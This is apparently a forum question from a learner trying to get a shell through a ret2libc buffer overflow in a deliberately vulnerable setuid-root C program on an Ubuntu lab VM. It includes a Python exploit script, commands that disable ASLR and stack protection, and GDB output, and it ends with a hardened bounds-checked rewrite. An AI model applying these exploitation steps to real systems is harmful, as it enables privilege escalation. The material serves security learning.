I have to open a shell in a C program with an exploit Python script. I am using an Ubuntu VM to do this.
The C program:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
    char buf[256];
    strcpy(buf, argv[1]);   /* unbounded copy of argv[1] into a 256-byte stack buffer */
    printf("%s\n", buf);
    return 0;
}
So far I have created an exploit.py:
#!/usr/bin/env python
import struct
padding = "A"*(10)+"B"*(10)+"C"*(10)+"D"*(10)+"E"*(10)+"F"*(10)+"G"*(10)+"H"*(10)+"I"*(10)+"J"*(10)+"K"*(10)+"L"*(10)+"M"*(10)+"N"*(10)+"O"*(10)+"P"*(10)+"Q"*(10)+"R"*(10)+"S"*(10)+"T"*(10)+"U"*(10)+"V"*(10) +"W"*(10)+"X"*(10)+"Y"*(10)+"Z"*(7)
system = struct.pack("I", 0x0000060d)
return_after_system = "AAAA"
bin_sh = struct.pack("I",0xf7f61e8b)
print padding + system + return_after_system + bin_sh
I found the /bin/sh address and verified it was the correct address; then I packed the structs.
I run the following commands before I run the code, to compile it and such:
sudo sysctl -w kernel.randomize_va_space=0
gcc -m32 -g -fno-stack-protector -o vulnerable -z execstack vulnerable.c
sudo chown root:root vulnerable
sudo chmod u+s vulnerable
Then I run the program like so:
./vulnerable `python exploit.py`
However, it just outputs the following, without the shell:
OUTPUT: AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHHHHHHHHHHIIIIIIIIIIJJJJJJJJJJKKKKKKKKKKLLLLLLLLLLMMMMMMMMMMNNNNNNNNNNOOOOOOOOOOPPPPPPPPPPQQQQQQQQQQRRRRRRRRRRSSSSSSSSSSTTTTTTTTTTUUUUUUUUUUVVVVVVVVVVWWWWWAAAA���XXXXXXYYYYYYYYYYZZZZZZZ Segmentation fault (core dumped)
The following is what I got from GDB for the vulnerable program:
0x000005b0 <+0>: lea ecx,[esp+0x4]
0x000005b4 <+4>: and esp,0xfffffff0
0x000005b7 <+7>: push DWORD PTR [ecx-0x4]
0x000005ba <+10>: push ebp
0x000005bb <+11>: mov ebp,esp
0x000005bd <+13>: push ebx
0x000005be <+14>: push ecx
0x000005bf <+15>: sub esp,0x100
0x000005c5 <+21>: call 0x480 <__x86.get_pc_thunk.bx>
0x000005ca <+26>: add ebx,0x1a06
0x000005d0 <+32>: mov eax,ecx
0x000005d2 <+34>: mov eax,DWORD PTR [eax+0x4]
0x000005d5 <+37>: add eax,0x4
0x000005d8 <+40>: mov eax,DWORD PTR [eax]
0x000005da <+42>: sub esp,0x8
0x000005dd <+45>: push eax
0x000005de <+46>: lea eax,[ebp-0x108]
0x000005e4 <+52>: push eax
0x000005e5 <+53>: call 0x418
0x000005ea <+58>: add esp,0x10
0x000005ed <+61>: sub esp,0xc
0x000005f0 <+64>: lea eax,[ebp-0x108]
0x000005f6 <+70>: push eax
0x000005f7 <+71>: call 0x420
0x000005fc <+76>: add esp,0x10
0x000005ff <+79>: mov eax,0x0
0x00000604 <+84>: lea esp,[ebp-0x8]
0x00000607 <+87>: pop ecx
0x00000608 <+88>: pop ebx
0x00000609 <+89>: pop ebp
0x0000060a <+90>: lea esp,[ecx-0x4]
0x0000060d <+93>: ret
I think the system variable in the exploit.py file does not have the correct address, but I do not know what the correct address is to change the base pointer and return address. I feel like I have the correct number of padding variables because, when I ran GDB, it listed ebp and eip as 0 when the program ended with padding alone:
eax 0x0 0
ecx 0xffff005a -65446
edx 0xf7fba870 -134502288
ebx 0x0 0
esp 0xffff005a 0xffff005a
ebp 0x0 0x0
esi 0xf7fb9000 -134508544
edi 0xf7fb9000 -134508544
eip 0x0 0x0
eflags 0x10282 [ SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
I would love any tips or suggestions. I have been following YouTube guides and other online resources, but I am having trouble figuring it out. Thank you!
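For contrast with the program in the question, here is the same program with the defect removed: the unbounded strcpy into the 256-byte stack buffer is replaced by a length-checked copy, and the missing argc check is added so a run with no argument no longer dereferences a NULL argv[1]. This is an added example written for this page, not the poster's code; the names copy_bounded, run and BUF_SIZE are assumptions, and the only behaviour carried over from the original is "copy argv[1] into a 256-byte buffer and print it".

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* same buffer size as the vulnerable program */

/*
 * Hardened replacement for strcpy(buf, argv[1]).
 * Copies src into dst only if it fits, including the terminating NUL.
 * Returns 0 on success and -1 if any argument is invalid or src is too
 * long; on failure dst is left as an empty string rather than partially
 * filled, so the caller cannot accidentally use an overlong input.
 */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    size_t len = strlen(src);
    if (len >= dst_size) {
        /* Would overflow: refuse instead of writing past the buffer. */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);   /* len + 1 copies the NUL as well */
    return 0;
}

/*
 * Same observable behaviour as the program in the question for inputs
 * that fit (print argv[1]), but it rejects missing or overlong input.
 * Returns the intended process exit status.
 */
int run(int argc, char *argv[])
{
    char buf[BUF_SIZE];

    if (argc < 2 || argv[1] == NULL) {
        fprintf(stderr, "usage: %s <string>\n", argc > 0 ? argv[0] : "prog");
        return 1;
    }
    if (copy_bounded(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    printf("%s\n", buf);
    return 0;
}

int main(int argc, char *argv[])
{
    return run(argc, argv);
}
```

Note that the question's build line turns off every mitigation that would otherwise make this bug hard to exploit (-fno-stack-protector, -z execstack, ASLR disabled via sysctl) and then makes the binary setuid root; with the bounded copy above, the 260-byte payload from exploit.py is simply rejected with "input too long" instead of overwriting the saved ebp and return address.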